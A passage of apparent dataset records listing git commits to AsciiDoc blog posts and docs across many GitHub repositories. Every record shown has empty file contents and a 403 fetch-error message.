Overview","message":"y2b create post HTC One Unboxing 
\\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-18-HTC-One-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-18-HTC-One-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f778bee0c2b2a5529ac5876153d905f40653e340","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9de89d07da813e0143c1eff44bc03a0dedbe06a3","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef2c32badeeedcb1729d2b542cf0a823d820d4c","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8420374c544aabf3db6367407999d492dc67620","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19cf1bed270dd75711d815b120b83d432b63cf2a","subject":"Update 2018-06-24-.adoc","message":"Update 
2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0207c3b13cdc28594f0722699fa4e630b71ad86d","subject":"added Readme for Dockerfile explanation","message":"added Readme for Dockerfile explanation\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05727e6b8bac55e09980363a048ff72c28aa9917","subject":"add notes on fast prediction of passes","message":"add notes on fast prediction of passes\n","repos":"valpo-sats\/scheduling-bazaar,valpo-sats\/scheduling-bazaar","old_file":"notes\/fast-pass-prediction.adoc","new_file":"notes\/fast-pass-prediction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/valpo-sats\/scheduling-bazaar.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1a7c02b169496e056f9c34284821a5022ffca7ac","subject":"Describes the all request table from the city employee view.","message":"Describes the all request table from the city employee view.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/table.adoc","new_file":"docs\/table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0c3d30472e2424a183329cd430c4b388c421a39","subject":"Add a README for the etc\/ directory..","message":"Add a README for the etc\/ directory..\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"etc\/README.adoc","new_file":"etc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f26ba5c8c8625f844151d880f34767eeb76f1a2","subject":"Add install from pip documentation","message":"Add install from pip documentation\n","repos":"google\/grr-doc","old_file":"installfrompip.adoc","new_file":"installfrompip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccac2ac10ffc1e30dda6d1abe206df03809bce44","subject":"y2b create post Deal Therapy: Pre-order the PS4?","message":"y2b create post Deal Therapy: Pre-order the 
PS4?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-23-Deal-Therapy-Preorder-the-PS4.adoc","new_file":"_posts\/2013-02-23-Deal-Therapy-Preorder-the-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5dcd4d5910ae3aa0fa68e317eb5b26bd1a4d8ae","subject":"y2b create post World's Fastest Portable Drive!","message":"y2b create post World's Fastest Portable Drive!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-21-Worlds-Fastest-Portable-Drive.adoc","new_file":"_posts\/2015-06-21-Worlds-Fastest-Portable-Drive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a00e0475f8bb54f2b39b5f21c5b07e5d42e9487","subject":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","message":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1902ea1248b562a1008ab5f69cf7baee946ed7cd","subject":"Update 2016-04-13-Ambientes-de-prueba.adoc","message":"Update 2016-04-13-Ambientes-de-prueba.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Ambientes-de-prueba.adoc","new_file":"_posts\/2016-04-13-Ambientes-de-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4afbcb0a05774e27f904b23c856ea0d9e9b3a2c2","subject":"Common google app engine Gradle plugin","message":"Common google app engine Gradle plugin\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-googleappengine-gradleplugin.adoc","new_file":"src\/main\/docs\/common-googleappengine-gradleplugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b63479cf2f544e81ddec6f3d1c4a4fff9f47222","subject":"Update 2015-12-15-shading.adoc","message":"Update 2015-12-15-shading.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-12-15-shading.adoc","new_file":"_posts\/2015-12-15-shading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af5ba5e735c05fa570648d3bbd777c31fbdb5b1b","subject":"Update 2017-02-01-Hello-2.adoc","message":"Update 2017-02-01-Hello-2.adoc","repos":"introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io","old_file":"_posts\/2017-02-01-Hello-2.adoc","new_file":"_posts\/2017-02-01-Hello-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/introspectively\/introspectively.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7424bf0824f02471fa37976ba04cc4611df80f01","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89dafaae45f3cfdd2148c6b84a94871319ffac61","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0954166b8b9055e60083577f184e238975d0417","subject":"Update 2020-01-31-secrets.adoc","message":"Update 2020-01-31-secrets.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-31-secrets.adoc","new_file":"_posts\/2020-01-31-secrets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"182e294bf1745c89de8cf460ea010967eddcc71c","subject":"Blog about protobuf decoder RPM","message":"Blog about protobuf decoder RPM\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-18-debezium-wears-fedora.adoc","new_file":"blog\/2019-06-18-debezium-wears-fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e4a725139c385cf6312821dbd23f41c6cd7fc17","subject":"Delete README-ko.adoc","message":"Delete 
README-ko.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-ko.adoc","new_file":"README-ko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd33541bf056986f178eb117998b5c4a02381519","subject":"Delete the file at '_posts\/2015-05-26-TEST.adoc'","message":"Delete the file at '_posts\/2015-05-26-TEST.adoc'","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-05-26-TEST.adoc","new_file":"_posts\/2015-05-26-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ad7b9407a0c99682bd1556ffcd45810ff892ddf","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07abfe49422febe095617859cda984efc8a18a20","subject":"Update 2017-07-07-Lazy-programmers-catching-my-eye.adoc","message":"Update 2017-07-07-Lazy-programmers-catching-my-eye.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Lazy-programmers-catching-my-eye.adoc","new_file":"_posts\/2017-07-07-Lazy-programmers-catching-my-eye.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d60380cfc99dc3cbe4572d806c64c1be51aa0b","subject":"Dynamodb guide","message":"Dynamodb guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/dynamodb-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/dynamodb-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da8496406e37da856489687dd5e9888188a2fa59","subject":"Update Ruby.adoc","message":"Update Ruby.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Ruby.adoc","new_file":"Linux\/Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17a5d3276cff87fd34c77b22845076f7e6ff7a62","subject":"Publish 2016-08-27.adoc","message":"Publish 
2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"2016-08-27.adoc","new_file":"2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8af6e259abfd6ece5e34b1efc7046252913479","subject":"Publish 2016-11-10.adoc","message":"Publish 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"2016-11-10.adoc","new_file":"2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc2f70d71e8eb46be08e8c21b4e1bd8a009e7084","subject":"Add readme","message":"Add readme\n","repos":"clbr\/urlmatch,clbr\/urlmatch","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clbr\/urlmatch.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"64792a4161bf0ad611c7d37cced6e58bee3e7e3d","subject":"y2b create post 3 Cool Tech Deals - #12","message":"y2b create post 3 Cool Tech Deals - #12","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-30-3-Cool-Tech-Deals--12.adoc","new_file":"_posts\/2015-12-30-3-Cool-Tech-Deals--12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d74ff1debb9112b8cef014418805eb0014b2b32","subject":"add 7 git commit messages","message":"add 7 git commit messages\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"PracticalTips.adoc","new_file":"PracticalTips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"bae1bd80ba44fb36ee962b67b5a5bf20bcd4158e","subject":"Update 2017-02-02-Modelando-um-Exercito.adoc","message":"Update 2017-02-02-Modelando-um-Exercito.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-02-02-Modelando-um-Exercito.adoc","new_file":"_posts\/2017-02-02-Modelando-um-Exercito.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2969e2758af3ac611d1a4ff556220e1c066dd321","subject":"Update 2017-06-06-IP-Addresses-in-Azure.adoc","message":"Update 
2017-06-06-IP-Addresses-in-Azure.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-06-06-IP-Addresses-in-Azure.adoc","new_file":"_posts\/2017-06-06-IP-Addresses-in-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dbc0846802bfc19391c46820750919a1423a17b","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b5f9dd3c98927e7e56714af7bb9e2ebf8362538","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37601a9df7c0f0ad09a85b7cc332f35e367905bb","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d28a2bfb0f523897d6954f8d78a1bf39a747b01","subject":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","message":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f03c6950f2fffac67203596d92746d603279a50","subject":"Update 2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","message":"Update 
2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","new_file":"_posts\/2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8d7904041eed41477b4d1263c4523104b598a12","subject":"Add README for Jenetics basic module.","message":"Add README for Jenetics basic module.\n","repos":"jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics","old_file":"jenetics\/README.adoc","new_file":"jenetics\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenetics\/jenetics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff255c59ef82d663e8cc715165fc62c4a343fbb1","subject":"disable updates in Fedora 21 installation example","message":"disable updates in Fedora 21 installation example\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d66c6372d31812e9ecd8c94b55ac0c1801af2824","subject":"Update 2016-06-03-Benchmarking.adoc","message":"Update 2016-06-03-Benchmarking.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-03-Benchmarking.adoc","new_file":"_posts\/2016-06-03-Benchmarking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9507140df9a8c1aa2f991abda6d48cd332e9f1bc","subject":"Update 2019-11-23-one-year-later-2.adoc","message":"Update 2019-11-23-one-year-later-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-one-year-later-2.adoc","new_file":"_posts\/2019-11-23-one-year-later-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8b8d16ea950e8eea9492fa4c400f09d472a505d","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5ec5b76e5b9ea453a36a7928d92e6ffe736ee3e","subject":"Update 2014-11-24-Episode-13-The-Anniversary.adoc","message":"Update 2014-11-24-Episode-13-The-Anniversary.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-11-24-Episode-13-The-Anniversary.adoc","new_file":"_posts\/2014-11-24-Episode-13-The-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1187c62b4208a347512d476f774cc9cbe2f9cd85","subject":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","message":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25dbfbe189b16ec28ffe6c3c273212e35a0cfc31","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5d9e8aed7ac4f98595110cf796cf0f53c41f142","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 